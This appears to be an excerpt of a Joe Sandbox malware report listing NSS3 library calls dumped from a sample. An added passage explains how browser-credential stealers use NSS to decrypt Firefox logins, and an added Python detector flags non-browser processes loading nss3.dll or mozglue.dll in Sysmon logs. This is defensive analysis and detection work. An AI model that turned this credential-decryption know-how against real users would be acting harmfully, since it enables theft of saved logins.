• API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
• String ID:
• API String ID: 3748922049-0
• Opcode ID: 9f32c7fa0e6edeeb942aa640586f9485bb9bbffcbf048f9759fa5f98a29733bd
• Instruction ID: 9538587150d1a1a6fdc86a3a27b3554f0732d2339f25fd19e859184d3eae6515
• Opcode Fuzzy Hash: 9f32c7fa0e6edeeb942aa640586f9485bb9bbffcbf048f9759fa5f98a29733bd
• Instruction Fuzzy Hash: 1551A1B6A001119BEB10FF69DC50FAA73F5AF48359F260528D84997740EB31F905CBD1
APIs
• PR_SetError.NSS3(FFFFD076,00000000), ref: 6C4EFFE5
  • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
• PR_EnterMonitor.NSS3(?), ref: 6C4F0004
• PR_EnterMonitor.NSS3(?), ref: 6C4F001B
Similarity
• API ID: EnterMonitor$ErrorValue
• String ID:
• API String ID: 3413098822-0
• Opcode ID: c90723736ae85db9d6e15b606aa1d86e78158f871be5656287a6206a9221ffe0
• Instruction ID: 723a01fe9171b1fabd2cba15f002211bcbaccebfb7f3a345d2a2a6c20d1a221a
• Opcode Fuzzy Hash: c90723736ae85db9d6e15b606aa1d86e78158f871be5656287a6206a9221ffe0
• Instruction Fuzzy Hash: DD4128B5244680CBE720CB28DD51FAB73A1DBC1349F10053DD46BCAF90E77AA94BC642
APIs
• PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C4AEF38
  • Part of subcall function 6C499520: PK11_IsLoggedIn.NSS3(00000000,?,6C4C379E,?,00000001,?), ref: 6C499542
• PK11_Authenticate.NSS3(?,00000001,?), ref: 6C4AEF53
  • Part of subcall function 6C4B4C20: TlsGetValue.KERNEL32 ref: 6C4B4C4C
  • Part of subcall function 6C4B4C20: EnterCriticalSection.KERNEL32(?), ref: 6C4B4C60
  • Part of subcall function 6C4B4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CA1
  • Part of subcall function 6C4B4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CBE
  • Part of subcall function 6C4B4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CD2
  • Part of subcall function 6C4B4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4D3A
• PR_GetCurrentThread.NSS3 ref: 6C4AEF9E
  • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
• free.MOZGLUE(00000000), ref: 6C4AEFC3
• PR_SetError.NSS3(FFFFE001,00000000), ref: 6C4AF016
• free.MOZGLUE(00000000), ref: 6C4AF022
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2459274275-0
                                                                                                                                                                                                                          • Opcode ID: 735339babbfed64299df6b602b2fac162ac90e3c3ac5681aa6bec873395f73b2
                                                                                                                                                                                                                          • Instruction ID: 771c71377bd5c236ad001a0f2338ee9dbe3b3de0b14c86f21d76ec03eb7cfc8d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 735339babbfed64299df6b602b2fac162ac90e3c3ac5681aa6bec873395f73b2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43417171E01109ABEF01CFE9DC85FEE7BB5EB58358F004029F914A6750E77299168BA1
APIs
• SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C484894
  • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
• SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4848CA
• SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4848DD
• SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6C4848FF
• SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C484912
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C48494A
  • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
• String ID:
• API String ID: 759476665-0
• Opcode ID: ed45cc974ebefbc00a4a77a437ae56a45f900b92df428003e929b401843bd5c5
• Instruction ID: 8259dedcdb35d900bb7581058a460a90aaa79fe2ff848a0a2988d83cff5989a3
• Opcode Fuzzy Hash: ed45cc974ebefbc00a4a77a437ae56a45f900b92df428003e929b401843bd5c5
• Instruction Fuzzy Hash: 2341D274A06305ABE710CE69CC90FAB73EC9F8429DF40052CEA5997B81F770E904CB92
APIs
• PORT_Alloc_Util.NSS3(00000060), ref: 6C49CF80
• SECITEM_DupItem_Util.NSS3(?), ref: 6C49D002
• PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C49D016
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49D025
• PR_NewLock.NSS3 ref: 6C49D043
• PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C49D074
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
• String ID:
• API String ID: 3361105336-0
• Opcode ID: 023c6f9769e78dcf1d9a6fbcb5d7c58b7121a8b0c3cbab1f9276d8c604b6e516
• Instruction ID: cd6f0a339e5e5a64f23b45d2358660fbcc702bb750a4583bba4735693d5b3c0a
• Opcode Fuzzy Hash: 023c6f9769e78dcf1d9a6fbcb5d7c58b7121a8b0c3cbab1f9276d8c604b6e516
• Instruction Fuzzy Hash: 904161B0A012218FEB10DF29C884F9ABFB4AF4835DF154169DC198BB56D774D885CBE1
APIs
• PORT_ArenaMark_Util.NSS3(?), ref: 6C4E3FF2
  • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
  • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
  • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
• PORT_ArenaMark_Util.NSS3(?), ref: 6C4E4001
• PORT_ArenaAlloc_Util.NSS3(?,00000074), ref: 6C4E400F
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
  • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
  • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
  • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
• CERT_CertChainFromCert.NSS3(?,00000004,00000000), ref: 6C4E4054
  • Part of subcall function 6C47BB90: PORT_NewArena_Util.NSS3(00001000), ref: 6C47BC24
  • Part of subcall function 6C47BB90: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C47BC39
  • Part of subcall function 6C47BB90: PORT_ArenaAlloc_Util.NSS3(00000000), ref: 6C47BC58
  • Part of subcall function 6C47BB90: SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C47BCBE
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4E4070
• NSS_CMSSignedData_Destroy.NSS3(00000000), ref: 6C4E40CD
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Util$Arena$Alloc_Value$CertCriticalEnterMark_SectionUnlock$AllocateArena_ChainCopyData_DestroyErrorFromItem_Signed
• String ID:
• API String ID: 3882640887-0
• Opcode ID: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
• Instruction ID: 024074b332031b399c2a669e95d2cd2f65bfc5c5deb53bc9044effd651d28dac
• Opcode Fuzzy Hash: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
• Instruction Fuzzy Hash: 8E31E771E0034197EB00DFA49C41FBA3374AF9975DF165238EE099BB42FB61E95882D2
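The functions listed above are not the sample's own code: they are routines inside the NSS library (module NSS3, with MOZGLUE as its allocator) that the sandbox dumped from process 2 of this analysis, and the PK11_*, SEC_*/SECOID_* and CERT_* exports are exactly the PKCS#11 and DER-handling entry points a credential stealer needs when it decrypts Firefox logins outside the browser. For a defender the actionable question is therefore which process loaded nss3.dll and mozglue.dll, and from where. The detector below is an added example and not part of the Joe Sandbox report; it runs over constructed Sysmon Event ID 7 (Image loaded) records, using Sysmon's Image / ImageLoaded / Signed field names, and its allow-lists of expected host processes and install directories are assumptions to tune for your estate.

```python
"""Flag non-browser processes loading Mozilla NSS libraries (Sysmon Event ID 7).

Added example, not part of the Joe Sandbox report. The records below are
constructed for illustration; field names follow Sysmon's ImageLoad event
(Image = loading process, ImageLoaded = DLL). Allow-lists are assumptions.
"""
from __future__ import annotations

import ntpath
from dataclasses import dataclass

# nss3.dll and mozglue.dll are the two modules visible in the report's API
# listings; softokn3.dll and freebl3.dll are the NSS token and crypto
# primitive libraries that nss3.dll itself loads, so a stealer ships them too.
NSS_DLLS = {"nss3.dll", "mozglue.dll", "softokn3.dll", "freebl3.dll"}

# Assumption: processes that legitimately host NSS on a workstation.
EXPECTED_HOST_IMAGES = {"firefox.exe", "thunderbird.exe"}

# Assumption: directories where a genuine Mozilla install places the DLLs.
EXPECTED_DLL_DIRS = (
    r"c:\program files\mozilla firefox",
    r"c:\program files (x86)\mozilla firefox",
    r"c:\program files\mozilla thunderbird",
)


@dataclass(frozen=True)
class ImageLoad:
    """Minimal view of a Sysmon Event ID 7 record."""
    process_id: int
    image: str          # path of the process performing the load
    image_loaded: str   # path of the DLL being loaded
    signed: bool        # Sysmon 'Signed' field


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _under_expected_dir(path: str) -> bool:
    # Trailing separator so "...\mozilla firefox evil\" does not match.
    low = ntpath.normpath(path).lower()
    return any(low.startswith(d + "\\") for d in EXPECTED_DLL_DIRS)


def classify(ev: ImageLoad) -> list[str]:
    """Return the reasons this image load is suspicious (empty list = benign)."""
    dll = _basename(ev.image_loaded)
    if dll not in NSS_DLLS:
        return []
    reasons: list[str] = []
    if _basename(ev.image) not in EXPECTED_HOST_IMAGES:
        reasons.append(f"{dll} loaded by unexpected process {_basename(ev.image)}")
    if not _under_expected_dir(ev.image_loaded):
        reasons.append(f"{dll} loaded from outside a Mozilla install dir: {ev.image_loaded}")
    if not ev.signed:
        reasons.append(f"{dll} is unsigned")
    return reasons


def detect(events: list[ImageLoad]) -> dict[int, list[str]]:
    """Group suspicious NSS loads by PID so one alert covers a whole stealer run."""
    hits: dict[int, list[str]] = {}
    for ev in events:
        reasons = classify(ev)
        if reasons:
            hits.setdefault(ev.process_id, []).extend(reasons)
    return hits


# Constructed sample: a normal Firefox load, then a dropper that fetched its
# own NSS copy into %PROGRAMDATA%. PIDs and paths are made up for the example.
SAMPLE_EVENTS = [
    ImageLoad(4120, r"C:\Program Files\Mozilla Firefox\firefox.exe",
              r"C:\Program Files\Mozilla Firefox\nss3.dll", True),
    ImageLoad(4120, r"C:\Program Files\Mozilla Firefox\firefox.exe",
              r"C:\Program Files\Mozilla Firefox\mozglue.dll", True),
    ImageLoad(6676, r"C:\Users\user\AppData\Local\Temp\5EfYBe3nch.exe",
              r"C:\ProgramData\nss3.dll", True),
    ImageLoad(6676, r"C:\Users\user\AppData\Local\Temp\5EfYBe3nch.exe",
              r"C:\ProgramData\mozglue.dll", True),
    ImageLoad(6676, r"C:\Users\user\AppData\Local\Temp\5EfYBe3nch.exe",
              r"C:\Windows\System32\kernel32.dll", True),
]

if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS).items():
        print(f"PID {pid}:")
        for r in reasons:
            print(f"  - {r}")
```

The two signals are deliberately independent: a stealer that side-loads a legitimately signed nss3.dll from %TEMP% still trips the directory check, and a renamed dropper that copies the DLLs into a look-alike folder still trips the host-process check. Tune EXPECTED_HOST_IMAGES for any in-house tooling that genuinely embeds NSS before deploying this as an alert.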
APIs
• SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C472D1A), ref: 6C482E7E
  • Part of subcall function 6C4D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C478298,?,?,?,6C46FCE5,?), ref: 6C4D07BF
  • Part of subcall function 6C4D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4D07E6
  • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D081B
  • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D0825
• PR_Now.NSS3 ref: 6C482EDF
• CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C482EE9
• SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C472D1A), ref: 6C482F01
• CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C472D1A), ref: 6C482F50
• SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C482F81
Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 287051776-0
                                                                                                                                                                                                                          • Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                                                                                                                          • Instruction ID: 8682b2fc8d0834e62865409b8ed5583c8029c3b12f2c589c8e67cbe18bafb401
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA31E1715031018BE730C659DC48FBFB265EB80319F64097AD62997AD0EF31D88AD665
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CERT_DecodeAVAValue.NSS3(?,?,6C470A2C), ref: 6C470E0F
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C470A2C), ref: 6C470E73
                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C470A2C), ref: 6C470E85
                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000001,?,?,6C470A2C), ref: 6C470E90
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C470EC4
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C470A2C), ref: 6C470ED9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3618544408-0
                                                                                                                                                                                                                          • Opcode ID: a00631a15ba2942482872cb6b72413bf3a01853ef86812595407374e4a0de15d
                                                                                                                                                                                                                          • Instruction ID: aaab6deb05cf1f27de5f81ae12faad1ec30d3399fbeda5048973e983c46ac478
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a00631a15ba2942482872cb6b72413bf3a01853ef86812595407374e4a0de15d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC212E72E0228457EB30C5665C45FEF72AEDBC1649F194035D81867B42EB62D81582F1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C47AEB3
                                                                                                                                                                                                                          • SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C47AECA
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C47AEDD
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE022,00000000), ref: 6C47AF02
                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C599500), ref: 6C47AF23
                                                                                                                                                                                                                            • Part of subcall function 6C4CF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C4CF0C8
                                                                                                                                                                                                                            • Part of subcall function 6C4CF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4CF122
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47AF37
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3714604333-0
                                                                                                                                                                                                                          • Opcode ID: 269004c1b0ff2aba8a83b9590b8d44f91a843efafbceb401c01fc07f95fde4f1
                                                                                                                                                                                                                          • Instruction ID: 20fdc0824170a401db236edcbb287b091fab19a9af12f6a45205b45adc2dd042
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 269004c1b0ff2aba8a83b9590b8d44f91a843efafbceb401c01fc07f95fde4f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE2128729092009BEB20CE189C01F9A7BA4AF85728F144319EC589B791E732D90587B7
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4FEE85
                                                                                                                                                                                                                          • realloc.MOZGLUE(92AB236F,?), ref: 6C4FEEAE
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C4FEEC5
                                                                                                                                                                                                                            • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                            • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                          • htonl.WSOCK32(?), ref: 6C4FEEE3
                                                                                                                                                                                                                          • htonl.WSOCK32(00000000,?), ref: 6C4FEEED
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C4FEF01
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1351805024-0
                                                                                                                                                                                                                          • Opcode ID: 2f0eef626e9d23d4c97c626db91c64e9507bb30c96329d2375e6751c23f70d33
                                                                                                                                                                                                                          • Instruction ID: 1302c93ff6b1680c7aef7fe43cc51715aa8d106401f163ad40432445739cef57
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f0eef626e9d23d4c97c626db91c64e9507bb30c96329d2375e6751c23f70d33
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD21B131A00224ABDB10DF28DC84F9A77A4EF85359F158129EC299B741E330ED16CBE6
APIs
• PORT_NewArena_Util.NSS3(00000800), ref: 6C477F68
  • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
  • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
  • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
• PORT_ArenaAlloc_Util.NSS3(00000000,0000002C), ref: 6C477F7B
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
  • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
  • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
  • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
• SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C477FA7
  • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
  • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
• SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C59919C,?), ref: 6C477FBB
  • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
• PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C477FCA
• SEC_QuickDERDecodeItem_Util.NSS3(00000000,-00000004,6C59915C,00000014), ref: 6C477FFE
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
